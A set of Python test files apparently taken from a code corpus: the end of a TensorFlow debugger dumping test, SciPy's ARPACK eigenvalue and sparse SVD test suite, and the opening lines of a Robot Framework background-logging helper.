# -1 is the unset tensor_id for eager op execution,
# device ID (set to -1 for now),
# dtype, rank, element_count,
# neg_inf_count, pos_inf_count, nan_count
# neg_finite_count, zero_count, pos_finite_count]
self.assertAllClose(
trace.debug_tensor_value,
[tensor_id, -1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
elif tensor_debug_mode == "SHAPE":
for trace in graph_exec_traces:
if trace.op_type == "Mul":
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
mul_value = reader.graph_execution_trace_to_tensor_value(trace)
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (float32).
# 3rd element: rank (0, scalar).
# 4th element: element count (1).
# Remaining elements: shape padded to fixed length (6).
self.assertAllClose(mul_value, [tensor_id, 1, 0, 1, 0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
mul_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Mul"]
self.assertAllClose(mul_values, [6.0, 6.0, 6.0, 6.0])
def testMultiThreadedDumpingWithDifferentSettings(self):
gpu_name = test_util.gpu_device_name()
if gpu_name:
self.skipTest("b/153671240: test is flaky on GPUs")
dump_root_1 = os.path.join(self.dump_root, "dump_root_1")
dump_root_2 = os.path.join(self.dump_root, "dump_root_2")
v1 = variables.Variable(10.0, dtype=dtypes.float32)
v2 = variables.Variable(3.0, dtype=dtypes.float32)
def add_negative_v1_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_1, tensor_debug_mode="FULL_TENSOR")
# Run in a loop to facilitate interleaving between threads.
for _ in range(3):
v1.assign_add(-(v1 ** 2.0))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
def add_negative_v2_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_2, tensor_debug_mode="FULL_TENSOR")
v2_squared = v2 ** 2.0
# Since dumping is disabled before the Neg op is called, no tensor data
# should be dumped from the op, but this shouldn't affect the dumping of
# the tensor data from the Neg op in `add_negative_v1_squared_to_itself`.
# Both behaviors are checked below.
dumping_callback.disable_dump_debug_info()
negative_v2_squared = -v2_squared
v2.assign_add(negative_v2_squared)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
# v2 is mutated on a sub-thread.
sub_thread = threading.Thread(target=add_negative_v2_squared_to_itself)
sub_thread.start()
add_negative_v1_squared_to_itself() # v1 is mutated on the main thread.
sub_thread.join()
# 10 - 10 * 10 = -90.
# -90 - (-90 * -90) = -8190.
# -8190 - (-8190 * -8190) = -67084290.
self.assertAllClose(v1.read_value(), -67084290.0)
self.assertAllClose(v2.read_value(), -6.0)
with debug_events_reader.DebugDataReader(dump_root_1) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
v1_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Pow"]
negative_v1_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Neg"]
self.assertAllClose(v1_squared_values, [[100.0], [8100.0], [67076100.0]])
self.assertAllClose(
negative_v1_squared_values, [[-100.0], [-8100.0], [-67076100.0]])
with debug_events_reader.DebugDataReader(dump_root_2) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
executed_op_types = [digest.op_type for digest in exec_digests]
self.assertNotIn("Neg", executed_op_types)
v2_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Pow"]
self.assertAllClose(v2_squared_values, [[9.0]])
@test_util.run_in_graph_and_eager_modes
def testNestedContextIsCapturedByGraphOpCreationHistory(self):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0 - 1.0
i += 1
return x
x = constant_op.constant(2.0, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
# 2 * 2 - 1 = 3; 3 * 2 - 1 = 5; 5 * 2 - 1 = 9; 9 * 2 - 1 = 17.
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 17.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
less_op_digest = reader.graph_op_digests(op_type="Less")[-1]
mul_op_digest = reader.graph_op_digests(op_type="Mul")[-1]
sub_op_digest = reader.graph_op_digests(op_type="Sub")[-1]
# The Less op is from the while-loop cond context and hence should have
# a different innermost context ID from the mul and sub ops, which are
# both from the while-loop body context.
self.assertNotEqual(less_op_digest.graph_id, mul_op_digest.graph_id)
self.assertNotEqual(less_op_digest.graph_id, sub_op_digest.graph_id)
# The Mul and Sub ops are from the same innermost context.
self.assertEqual(mul_op_digest.graph_id, sub_op_digest.graph_id)
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
test_arpack.py
|
from __future__ import division, print_function, absolute_import
__usage__ = """
To run tests locally:
python tests/test_arpack.py [-l<int>] [-v<int>]
"""
import warnings
import threading
import numpy as np
from numpy.testing import assert_allclose, \
assert_array_almost_equal_nulp, run_module_suite, \
assert_raises, assert_equal, assert_array_equal
from numpy import dot, conj, random
from scipy.linalg import eig, eigh
from scipy.sparse import csc_matrix, csr_matrix, isspmatrix, diags
from scipy.sparse.linalg import LinearOperator, aslinearoperator
from scipy.sparse.linalg.eigen.arpack import eigs, eigsh, svds, \
ArpackNoConvergence, arpack
from scipy.linalg import svd, hilbert
from scipy._lib._gcutils import assert_deallocated
# eigs() and eigsh() are called many times, so apply a filter for the warnings
# they generate here.
_eigs_warn_msg = "Single-precision types in `eigs` and `eighs`"
def setup_module():
warnings.filterwarnings("ignore", message=_eigs_warn_msg)
def teardown_module():
warnings.filterwarnings("default", message=_eigs_warn_msg)
# precision for tests
_ndigits = {'f': 3, 'd': 11, 'F': 3, 'D': 11}
def _get_test_tolerance(type_char, mattype=None):
"""
Return tolerance values suitable for a given test:
Parameters
----------
type_char : {'f', 'd', 'F', 'D'}
Data type in ARPACK eigenvalue problem
mattype : {csr_matrix, aslinearoperator, asarray}, optional
Linear operator type
Returns
-------
tol
Tolerance to pass to the ARPACK routine
rtol
Relative tolerance for outputs
atol
Absolute tolerance for outputs
"""
rtol = {'f': 3000 * np.finfo(np.float32).eps,
'F': 3000 * np.finfo(np.float32).eps,
'd': 2000 * np.finfo(np.float64).eps,
'D': 2000 * np.finfo(np.float64).eps}[type_char]
atol = rtol
tol = 0
if mattype is aslinearoperator and type_char in ('f', 'F'):
# iterative methods in single precision: worse errors
# also: bump ARPACK tolerance so that the iterative method converges
tol = 30 * np.finfo(np.float32).eps
rtol *= 5
if mattype is csr_matrix and type_char in ('f', 'F'):
# sparse in single precision: worse errors
rtol *= 5
return tol, rtol, atol
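# Hedged illustration (not part of the original tolerances, just the numbers they
# imply): single precision ('f'/'F') gets rtol = atol = 3000 * eps(float32),
# roughly 3.6e-4, and double precision ('d'/'D') gets 2000 * eps(float64),
# roughly 4.4e-13. For aslinearoperator inputs in single precision the ARPACK tol
# is additionally raised to 30 * eps(float32) and rtol is multiplied by 5; for
# csr_matrix single-precision inputs only the rtol *= 5 relaxation applies.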
def generate_matrix(N, complex=False, hermitian=False,
pos_definite=False, sparse=False):
M = np.random.random((N,N))
if complex:
M = M + 1j * np.random.random((N,N))
if hermitian:
if pos_definite:
if sparse:
i = np.arange(N)
j = np.random.randint(N, size=N-2)
i, j = np.meshgrid(i, j)
M[i,j] = 0
M = np.dot(M.conj(), M.T)
else:
M = np.dot(M.conj(), M.T)
if sparse:
i = np.random.randint(N, size=N * N // 4)
j = np.random.randint(N, size=N * N // 4)
ind = np.where(i == j)
j[ind] = (j[ind] + 1) % N
M[i,j] = 0
M[j,i] = 0
else:
if sparse:
i = np.random.randint(N, size=N * N // 2)
j = np.random.randint(N, size=N * N // 2)
M[i,j] = 0
return M
def _aslinearoperator_with_dtype(m):
m = aslinearoperator(m)
if not hasattr(m, 'dtype'):
x = np.zeros(m.shape[1])
m.dtype = (m * x).dtype
return m
def assert_allclose_cc(actual, desired, **kw):
"""Almost equal or complex conjugates almost equal"""
try:
assert_allclose(actual, desired, **kw)
    except AssertionError:
assert_allclose(actual, conj(desired), **kw)
def argsort_which(eval, typ, k, which,
sigma=None, OPpart=None, mode=None):
"""Return sorted indices of eigenvalues using the "which" keyword
from eigs and eigsh"""
if sigma is None:
reval = np.round(eval, decimals=_ndigits[typ])
else:
if mode is None or mode == 'normal':
if OPpart is None:
reval = 1. / (eval - sigma)
elif OPpart == 'r':
reval = 0.5 * (1. / (eval - sigma)
+ 1. / (eval - np.conj(sigma)))
elif OPpart == 'i':
reval = -0.5j * (1. / (eval - sigma)
- 1. / (eval - np.conj(sigma)))
elif mode == 'cayley':
reval = (eval + sigma) / (eval - sigma)
elif mode == 'buckling':
reval = eval / (eval - sigma)
else:
raise ValueError("mode='%s' not recognized" % mode)
reval = np.round(reval, decimals=_ndigits[typ])
if which in ['LM', 'SM']:
ind = np.argsort(abs(reval))
elif which in ['LR', 'SR', 'LA', 'SA', 'BE']:
ind = np.argsort(np.real(reval))
elif which in ['LI', 'SI']:
# for LI,SI ARPACK returns largest,smallest abs(imaginary) why?
if typ.islower():
ind = np.argsort(abs(np.imag(reval)))
else:
ind = np.argsort(np.imag(reval))
else:
raise ValueError("which='%s' is unrecognized" % which)
if which in ['LM', 'LA', 'LR', 'LI']:
return ind[-k:]
elif which in ['SM', 'SA', 'SR', 'SI']:
return ind[:k]
elif which == 'BE':
return np.concatenate((ind[:k//2], ind[k//2-k:]))
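# Hedged worked example (values chosen for illustration only): for
# eval = [1.0, -3.0, 2.0], typ='d', k=2 and sigma=None, which='LM' selects the
# indices of -3.0 and 2.0 (largest magnitude), while which='SR' would select the
# indices of -3.0 and 1.0 (smallest real part).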
def eval_evec(symmetric, d, typ, k, which, v0=None, sigma=None,
mattype=np.asarray, OPpart=None, mode='normal'):
general = ('bmat' in d)
if symmetric:
eigs_func = eigsh
else:
eigs_func = eigs
if general:
err = ("error for %s:general, typ=%s, which=%s, sigma=%s, "
"mattype=%s, OPpart=%s, mode=%s" % (eigs_func.__name__,
typ, which, sigma,
mattype.__name__,
OPpart, mode))
else:
err = ("error for %s:standard, typ=%s, which=%s, sigma=%s, "
"mattype=%s, OPpart=%s, mode=%s" % (eigs_func.__name__,
typ, which, sigma,
mattype.__name__,
OPpart, mode))
a = d['mat'].astype(typ)
ac = mattype(a)
if general:
b = d['bmat'].astype(typ.lower())
bc = mattype(b)
# get exact eigenvalues
exact_eval = d['eval'].astype(typ.upper())
ind = argsort_which(exact_eval, typ, k, which,
sigma, OPpart, mode)
exact_eval = exact_eval[ind]
# compute arpack eigenvalues
kwargs = dict(which=which, v0=v0, sigma=sigma)
if eigs_func is eigsh:
kwargs['mode'] = mode
else:
kwargs['OPpart'] = OPpart
# compute suitable tolerances
kwargs['tol'], rtol, atol = _get_test_tolerance(typ, mattype)
# on rare occasions, ARPACK routines return results that are proper
# eigenvalues and -vectors, but not necessarily the ones requested in
# the parameter which. This is inherent to the Krylov methods, and
# should not be treated as a failure. If such a rare situation
# occurs, the calculation is tried again (but at most a few times).
ntries = 0
while ntries < 5:
# solve
if general:
try:
eval, evec = eigs_func(ac, k, bc, **kwargs)
except ArpackNoConvergence:
kwargs['maxiter'] = 20*a.shape[0]
eval, evec = eigs_func(ac, k, bc, **kwargs)
else:
try:
eval, evec = eigs_func(ac, k, **kwargs)
except ArpackNoConvergence:
kwargs['maxiter'] = 20*a.shape[0]
eval, evec = eigs_func(ac, k, **kwargs)
ind = argsort_which(eval, typ, k, which,
sigma, OPpart, mode)
eval = eval[ind]
evec = evec[:,ind]
# check eigenvectors
LHS = np.dot(a, evec)
if general:
RHS = eval * np.dot(b, evec)
else:
RHS = eval * evec
assert_allclose(LHS, RHS, rtol=rtol, atol=atol, err_msg=err)
try:
# check eigenvalues
assert_allclose_cc(eval, exact_eval, rtol=rtol, atol=atol,
err_msg=err)
break
except AssertionError:
ntries += 1
# check eigenvalues
assert_allclose_cc(eval, exact_eval, rtol=rtol, atol=atol, err_msg=err)
class DictWithRepr(dict):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<%s>" % self.name
class SymmetricParams:
def __init__(self):
self.eigs = eigsh
self.which = ['LM', 'SM', 'LA', 'SA', 'BE']
self.mattypes = [csr_matrix, aslinearoperator, np.asarray]
self.sigmas_modes = {None: ['normal'],
0.5: ['normal', 'buckling', 'cayley']}
# generate matrices
# these should all be float32 so that the eigenvalues
# are the same in float32 and float64
N = 6
np.random.seed(2300)
Ar = generate_matrix(N, hermitian=True,
pos_definite=True).astype('f').astype('d')
M = generate_matrix(N, hermitian=True,
pos_definite=True).astype('f').astype('d')
Ac = generate_matrix(N, hermitian=True, pos_definite=True,
complex=True).astype('F').astype('D')
v0 = np.random.random(N)
# standard symmetric problem
SS = DictWithRepr("std-symmetric")
SS['mat'] = Ar
SS['v0'] = v0
SS['eval'] = eigh(SS['mat'], eigvals_only=True)
# general symmetric problem
GS = DictWithRepr("gen-symmetric")
GS['mat'] = Ar
GS['bmat'] = M
GS['v0'] = v0
GS['eval'] = eigh(GS['mat'], GS['bmat'], eigvals_only=True)
# standard hermitian problem
SH = DictWithRepr("std-hermitian")
SH['mat'] = Ac
SH['v0'] = v0
SH['eval'] = eigh(SH['mat'], eigvals_only=True)
# general hermitian problem
GH = DictWithRepr("gen-hermitian")
GH['mat'] = Ac
GH['bmat'] = M
GH['v0'] = v0
GH['eval'] = eigh(GH['mat'], GH['bmat'], eigvals_only=True)
self.real_test_cases = [SS, GS]
self.complex_test_cases = [SH, GH]
class NonSymmetricParams:
def __init__(self):
self.eigs = eigs
self.which = ['LM', 'LR', 'LI'] # , 'SM', 'LR', 'SR', 'LI', 'SI']
self.mattypes = [csr_matrix, aslinearoperator, np.asarray]
self.sigmas_OPparts = {None: [None],
0.1: ['r'],
0.1 + 0.1j: ['r', 'i']}
# generate matrices
# these should all be float32 so that the eigenvalues
# are the same in float32 and float64
N = 6
np.random.seed(2300)
Ar = generate_matrix(N).astype('f').astype('d')
M = generate_matrix(N, hermitian=True,
pos_definite=True).astype('f').astype('d')
Ac = generate_matrix(N, complex=True).astype('F').astype('D')
v0 = np.random.random(N)
# standard real nonsymmetric problem
SNR = DictWithRepr("std-real-nonsym")
SNR['mat'] = Ar
SNR['v0'] = v0
SNR['eval'] = eig(SNR['mat'], left=False, right=False)
# general real nonsymmetric problem
GNR = DictWithRepr("gen-real-nonsym")
GNR['mat'] = Ar
GNR['bmat'] = M
GNR['v0'] = v0
GNR['eval'] = eig(GNR['mat'], GNR['bmat'], left=False, right=False)
# standard complex nonsymmetric problem
SNC = DictWithRepr("std-cmplx-nonsym")
SNC['mat'] = Ac
SNC['v0'] = v0
SNC['eval'] = eig(SNC['mat'], left=False, right=False)
# general complex nonsymmetric problem
GNC = DictWithRepr("gen-cmplx-nonsym")
GNC['mat'] = Ac
GNC['bmat'] = M
GNC['v0'] = v0
GNC['eval'] = eig(GNC['mat'], GNC['bmat'], left=False, right=False)
self.real_test_cases = [SNR, GNR]
self.complex_test_cases = [SNC, GNC]
def test_symmetric_modes():
params = SymmetricParams()
k = 2
symmetric = True
for D in params.real_test_cases:
for typ in 'fd':
for which in params.which:
for mattype in params.mattypes:
for (sigma, modes) in params.sigmas_modes.items():
for mode in modes:
yield (eval_evec, symmetric, D, typ, k, which,
None, sigma, mattype, None, mode)
def test_hermitian_modes():
params = SymmetricParams()
k = 2
symmetric = True
for D in params.complex_test_cases:
for typ in 'FD':
for which in params.which:
if which == 'BE':
continue # BE invalid for complex
for mattype in params.mattypes:
for sigma in params.sigmas_modes:
yield (eval_evec, symmetric, D, typ, k, which,
None, sigma, mattype)
def test_symmetric_starting_vector():
params = SymmetricParams()
symmetric = True
for k in [1, 2, 3, 4, 5]:
for D in params.real_test_cases:
for typ in 'fd':
v0 = random.rand(len(D['v0'])).astype(typ)
yield (eval_evec, symmetric, D, typ, k, 'LM', v0)
def test_symmetric_no_convergence():
np.random.seed(1234)
m = generate_matrix(30, hermitian=True, pos_definite=True)
tol, rtol, atol = _get_test_tolerance('d')
try:
w, v = eigsh(m, 4, which='LM', v0=m[:, 0], maxiter=5, tol=tol, ncv=9)
raise AssertionError("Spurious no-error exit")
except ArpackNoConvergence as err:
k = len(err.eigenvalues)
if k <= 0:
raise AssertionError("Spurious no-eigenvalues-found case")
w, v = err.eigenvalues, err.eigenvectors
assert_allclose(dot(m, v), w * v, rtol=rtol, atol=atol)
def test_real_nonsymmetric_modes():
params = NonSymmetricParams()
k = 2
symmetric = False
for D in params.real_test_cases:
for typ in 'fd':
for which in params.which:
for mattype in params.mattypes:
for sigma, OPparts in params.sigmas_OPparts.items():
for OPpart in OPparts:
yield (eval_evec, symmetric, D, typ, k, which,
None, sigma, mattype, OPpart)
def test_complex_nonsymmetric_modes():
params = NonSymmetricParams()
k = 2
symmetric = False
for D in params.complex_test_cases:
for typ in 'DF':
for which in params.which:
for mattype in params.mattypes:
for sigma in params.sigmas_OPparts:
yield (eval_evec, symmetric, D, typ, k, which,
None, sigma, mattype)
def test_standard_nonsymmetric_starting_vector():
params = NonSymmetricParams()
sigma = None
symmetric = False
for k in [1, 2, 3, 4]:
for d in params.complex_test_cases:
for typ in 'FD':
A = d['mat']
n = A.shape[0]
v0 = random.rand(n).astype(typ)
yield (eval_evec, symmetric, d, typ, k, "LM", v0, sigma)
def test_general_nonsymmetric_starting_vector():
params = NonSymmetricParams()
sigma = None
symmetric = False
for k in [1, 2, 3, 4]:
for d in params.complex_test_cases:
for typ in 'FD':
A = d['mat']
n = A.shape[0]
v0 = random.rand(n).astype(typ)
yield (eval_evec, symmetric, d, typ, k, "LM", v0, sigma)
def test_standard_nonsymmetric_no_convergence():
np.random.seed(1234)
m = generate_matrix(30, complex=True)
tol, rtol, atol = _get_test_tolerance('d')
try:
w, v = eigs(m, 4, which='LM', v0=m[:, 0], maxiter=5, tol=tol)
raise AssertionError("Spurious no-error exit")
except ArpackNoConvergence as err:
k = len(err.eigenvalues)
if k <= 0:
raise AssertionError("Spurious no-eigenvalues-found case")
w, v = err.eigenvalues, err.eigenvectors
for ww, vv in zip(w, v.T):
assert_allclose(dot(m, vv), ww * vv, rtol=rtol, atol=atol)
def test_eigen_bad_shapes():
# A is not square.
A = csc_matrix(np.zeros((2, 3)))
assert_raises(ValueError, eigs, A)
def test_eigen_bad_kwargs():
# Test eigen on wrong keyword argument
A = csc_matrix(np.zeros((2, 2)))
assert_raises(ValueError, eigs, A, which='XX')
def test_ticket_1459_arpack_crash():
for dtype in [np.float32, np.float64]:
# XXX: this test does not seem to catch the issue for float32,
# but we made the same fix there, just to be sure
N = 6
k = 2
np.random.seed(2301)
A = np.random.random((N, N)).astype(dtype)
v0 = np.array([-0.71063568258907849895, -0.83185111795729227424,
-0.34365925382227402451, 0.46122533684552280420,
-0.58001341115969040629, -0.78844877570084292984e-01],
dtype=dtype)
# Should not crash:
evals, evecs = eigs(A, k, v0=v0)
#----------------------------------------------------------------------
# sparse SVD tests
def sorted_svd(m, k, which='LM'):
# Compute svd of a dense matrix m, and return singular vectors/values
# sorted.
if isspmatrix(m):
m = m.todense()
u, s, vh = svd(m)
if which == 'LM':
ii = np.argsort(s)[-k:]
elif which == 'SM':
ii = np.argsort(s)[:k]
else:
raise ValueError("unknown which=%r" % (which,))
return u[:, ii], s[ii], vh[ii]
def svd_estimate(u, s, vh):
return np.dot(u, np.dot(np.diag(s), vh))
def svd_test_input_check():
x = np.array([[1, 2, 3],
[3, 4, 3],
[1, 0, 2],
[0, 0, 1]], float)
assert_raises(ValueError, svds, x, k=-1)
assert_raises(ValueError, svds, x, k=0)
assert_raises(ValueError, svds, x, k=10)
assert_raises(ValueError, svds, x, k=x.shape[0])
assert_raises(ValueError, svds, x, k=x.shape[1])
assert_raises(ValueError, svds, x.T, k=x.shape[0])
assert_raises(ValueError, svds, x.T, k=x.shape[1])
def test_svd_simple_real():
x = np.array([[1, 2, 3],
[3, 4, 3],
[1, 0, 2],
[0, 0, 1]], float)
y = np.array([[1, 2, 3, 8],
[3, 4, 3, 5],
[1, 0, 2, 3],
[0, 0, 1, 0]], float)
z = csc_matrix(x)
for m in [x.T, x, y, z, z.T]:
for k in range(1, min(m.shape)):
u, s, vh = sorted_svd(m, k)
su, ss, svh = svds(m, k)
m_hat = svd_estimate(u, s, vh)
sm_hat = svd_estimate(su, ss, svh)
assert_array_almost_equal_nulp(m_hat, sm_hat, nulp=1000)
def test_svd_simple_complex():
x = np.array([[1, 2, 3],
[3, 4, 3],
[1 + 1j, 0, 2],
[0, 0, 1]], complex)
y = np.array([[1, 2, 3, 8 + 5j],
[3 - 2j, 4, 3, 5],
[1, 0, 2, 3],
[0, 0, 1, 0]], complex)
z = csc_matrix(x)
for m in [x, x.T.conjugate(), x.T, y, y.conjugate(), z, z.T]:
for k in range(1, min(m.shape) - 1):
u, s, vh = sorted_svd(m, k)
su, ss, svh = svds(m, k)
m_hat = svd_estimate(u, s, vh)
sm_hat = svd_estimate(su, ss, svh)
assert_array_almost_equal_nulp(m_hat, sm_hat, nulp=1000)
def test_svd_maxiter():
# check that maxiter works as expected
x = hilbert(6)
# ARPACK shouldn't converge on such an ill-conditioned matrix with just
# one iteration
assert_raises(ArpackNoConvergence, svds, x, 1, maxiter=1, ncv=3)
# but 100 iterations should be more than enough
u, s, vt = svds(x, 1, maxiter=100, ncv=3)
assert_allclose(s, [1.7], atol=0.5)
def test_svd_return():
# check that the return_singular_vectors parameter works as expected
x = hilbert(6)
_, s, _ = sorted_svd(x, 2)
ss = svds(x, 2, return_singular_vectors=False)
assert_allclose(s, ss)
def test_svd_which():
# check that the which parameter works as expected
x = hilbert(6)
for which in ['LM', 'SM']:
_, s, _ = sorted_svd(x, 2, which=which)
ss = svds(x, 2, which=which, return_singular_vectors=False)
ss.sort()
assert_allclose(s, ss, atol=np.sqrt(1e-15))
def test_svd_v0():
# check that the v0 parameter works as expected
x = np.array([[1, 2, 3, 4], [5, 6, 7, 8]], float)
u, s, vh = svds(x, 1)
u2, s2, vh2 = svds(x, 1, v0=u[:,0])
assert_allclose(s, s2, atol=np.sqrt(1e-15))
def _check_svds(A, k, U, s, VH):
n, m = A.shape
# Check shapes.
assert_equal(U.shape, (n, k))
assert_equal(s.shape, (k,))
assert_equal(VH.shape, (k, m))
# Check that the original matrix can be reconstituted.
A_rebuilt = (U*s).dot(VH)
assert_equal(A_rebuilt.shape, A.shape)
assert_allclose(A_rebuilt, A)
# Check that U is a semi-orthogonal matrix.
UH_U = np.dot(U.T.conj(), U)
assert_equal(UH_U.shape, (k, k))
assert_allclose(UH_U, np.identity(k), atol=1e-12)
# Check that V is a semi-orthogonal matrix.
VH_V = np.dot(VH, VH.T.conj())
assert_equal(VH_V.shape, (k, k))
assert_allclose(VH_V, np.identity(k), atol=1e-12)
def test_svd_LM_ones_matrix():
# Check that svds can deal with matrix_rank less than k in LM mode.
k = 3
for n, m in (6, 5), (5, 5), (5, 6):
for t in float, complex:
A = np.ones((n, m), dtype=t)
U, s, VH = svds(A, k)
# Check some generic properties of svd.
_check_svds(A, k, U, s, VH)
# Check that the largest singular value is near sqrt(n*m)
# and the other singular values have been forced to zero.
assert_allclose(np.max(s), np.sqrt(n*m))
assert_array_equal(sorted(s)[:-1], 0)
def test_svd_LM_zeros_matrix():
# Check that svds can deal with matrices containing only zeros.
k = 1
for n, m in (3, 4), (4, 4), (4, 3):
for t in float, complex:
A = np.zeros((n, m), dtype=t)
U, s, VH = svds(A, k)
# Check some generic properties of svd.
_check_svds(A, k, U, s, VH)
# Check that the singular values are zero.
assert_array_equal(s, 0)
def test_svd_LM_zeros_matrix_gh_3452():
# Regression test for a github issue.
# https://github.com/scipy/scipy/issues/3452
    # Note that for complex dtype the size of this matrix is too small for k=1.
n, m, k = 4, 2, 1
A = np.zeros((n, m))
U, s, VH = svds(A, k)
# Check some generic properties of svd.
_check_svds(A, k, U, s, VH)
# Check that the singular values are zero.
assert_array_equal(s, 0)
class CheckingLinearOperator(LinearOperator):
def __init__(self, A):
self.A = A
self.dtype = A.dtype
self.shape = A.shape
def _matvec(self, x):
assert_equal(max(x.shape), np.size(x))
return self.A.dot(x)
def _rmatvec(self, x):
assert_equal(max(x.shape), np.size(x))
return self.A.T.conjugate().dot(x)
def test_svd_linop():
nmks = [(6, 7, 3),
(9, 5, 4),
(10, 8, 5)]
def reorder(args):
U, s, VH = args
j = np.argsort(s)
return U[:,j], s[j], VH[j,:]
for n, m, k in nmks:
# Test svds on a LinearOperator.
A = np.random.RandomState(52).randn(n, m)
L = CheckingLinearOperator(A)
v0 = np.ones(min(A.shape))
U1, s1, VH1 = reorder(svds(A, k, v0=v0))
U2, s2, VH2 = reorder(svds(L, k, v0=v0))
assert_allclose(np.abs(U1), np.abs(U2))
assert_allclose(s1, s2)
assert_allclose(np.abs(VH1), np.abs(VH2))
assert_allclose(np.dot(U1, np.dot(np.diag(s1), VH1)),
np.dot(U2, np.dot(np.diag(s2), VH2)))
# Try again with which="SM".
A = np.random.RandomState(1909).randn(n, m)
L = CheckingLinearOperator(A)
U1, s1, VH1 = reorder(svds(A, k, which="SM"))
U2, s2, VH2 = reorder(svds(L, k, which="SM"))
assert_allclose(np.abs(U1), np.abs(U2))
assert_allclose(s1, s2)
assert_allclose(np.abs(VH1), np.abs(VH2))
assert_allclose(np.dot(U1, np.dot(np.diag(s1), VH1)),
np.dot(U2, np.dot(np.diag(s2), VH2)))
if k < min(n, m) - 1:
# Complex input and explicit which="LM".
for (dt, eps) in [(complex, 1e-7), (np.complex64, 1e-3)]:
rng = np.random.RandomState(1648)
A = (rng.randn(n, m) + 1j * rng.randn(n, m)).astype(dt)
L = CheckingLinearOperator(A)
U1, s1, VH1 = reorder(svds(A, k, which="LM"))
U2, s2, VH2 = reorder(svds(L, k, which="LM"))
assert_allclose(np.abs(U1), np.abs(U2), rtol=eps)
assert_allclose(s1, s2, rtol=eps)
assert_allclose(np.abs(VH1), np.abs(VH2), rtol=eps)
assert_allclose(np.dot(U1, np.dot(np.diag(s1), VH1)),
np.dot(U2, np.dot(np.diag(s2), VH2)), rtol=eps)
def test_linearoperator_deallocation():
# Check that the linear operators used by the Arpack wrappers are
# deallocatable by reference counting -- they are big objects, so
# Python's cyclic GC may not collect them fast enough before
# running out of memory if eigs/eigsh are called in a tight loop.
M_d = np.eye(10)
M_s = csc_matrix(M_d)
M_o = aslinearoperator(M_d)
with assert_deallocated(lambda: arpack.SpLuInv(M_s)):
pass
with assert_deallocated(lambda: arpack.LuInv(M_d)):
pass
with assert_deallocated(lambda: arpack.IterInv(M_s)):
pass
with assert_deallocated(lambda: arpack.IterOpInv(M_o, None, 0.3)):
pass
with assert_deallocated(lambda: arpack.IterOpInv(M_o, M_o, 0.3)):
pass
def test_svds_partial_return():
x = np.array([[1, 2, 3],
[3, 4, 3],
[1, 0, 2],
[0, 0, 1]], float)
# test vertical matrix
z = csr_matrix(x)
vh_full = svds(z, 2)[-1]
vh_partial = svds(z, 2, return_singular_vectors='vh')[-1]
dvh = np.linalg.norm(np.abs(vh_full) - np.abs(vh_partial))
if dvh > 1e-10:
raise AssertionError('right eigenvector matrices differ when using return_singular_vectors parameter')
if svds(z, 2, return_singular_vectors='vh')[0] is not None:
raise AssertionError('left eigenvector matrix was computed when it should not have been')
# test horizontal matrix
z = csr_matrix(x.T)
u_full = svds(z, 2)[0]
u_partial = svds(z, 2, return_singular_vectors='vh')[0]
du = np.linalg.norm(np.abs(u_full) - np.abs(u_partial))
if du > 1e-10:
raise AssertionError('left eigenvector matrices differ when using return_singular_vectors parameter')
if svds(z, 2, return_singular_vectors='u')[-1] is not None:
raise AssertionError('right eigenvector matrix was computed when it should not have been')
def test_svds_wrong_eigen_type():
# Regression test for a github issue.
# https://github.com/scipy/scipy/issues/4590
# Function was not checking for eigenvalue type and unintended
# values could be returned.
x = np.array([[1, 2, 3],
[3, 4, 3],
[1, 0, 2],
[0, 0, 1]], float)
assert_raises(ValueError, svds, x, 1, which='LA')
def test_parallel_threads():
results = []
v0 = np.random.rand(50)
def worker():
x = diags([1, -2, 1], [-1, 0, 1], shape=(50, 50))
w, v = eigs(x, k=3, v0=v0)
results.append(w)
w, v = eigsh(x, k=3, v0=v0)
results.append(w)
threads = [threading.Thread(target=worker) for k in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
worker()
for r in results:
assert_allclose(r, results[-1])
def test_reentering():
# Just some linear operator that calls eigs recursively
def A_matvec(x):
x = diags([1, -2, 1], [-1, 0, 1], shape=(50, 50))
w, v = eigs(x, k=1)
return v / w[0]
A = LinearOperator(matvec=A_matvec, dtype=float, shape=(50, 50))
# The Fortran code is not reentrant, so this fails (gracefully, not crashing)
assert_raises(RuntimeError, eigs, A, k=1)
assert_raises(RuntimeError, eigsh, A, k=1)
def test_regression_arpackng_1315():
# Check that issue arpack-ng/#1315 is not present.
# Adapted from arpack-ng/TESTS/bug_1315_single.c
# If this fails, then the installed ARPACK library is faulty.
for dtype in [np.float32, np.float64]:
np.random.seed(1234)
w0 = np.arange(1, 1000+1).astype(dtype)
A = diags([w0], [0], shape=(1000, 1000))
v0 = np.random.rand(1000).astype(dtype)
w, v = eigs(A, k=9, ncv=2*9+1, which="LM", v0=v0)
assert_allclose(np.sort(w), np.sort(w0[-9:]),
rtol=1e-4)
if __name__ == "__main__":
run_module_suite()
|
background_logs.py
|
import threading
from robot.api.logger import BackgroundLogger
logger = BackgroundLogger()
def log_from_main(msg):
logger.info(msg)
def log_from_background(msg, thread=None):
t = threading.Thread(target=logger.info, args=(msg,))
if thread:
t.setName(thread)
t.start()
def log_background_messages(thread=None):
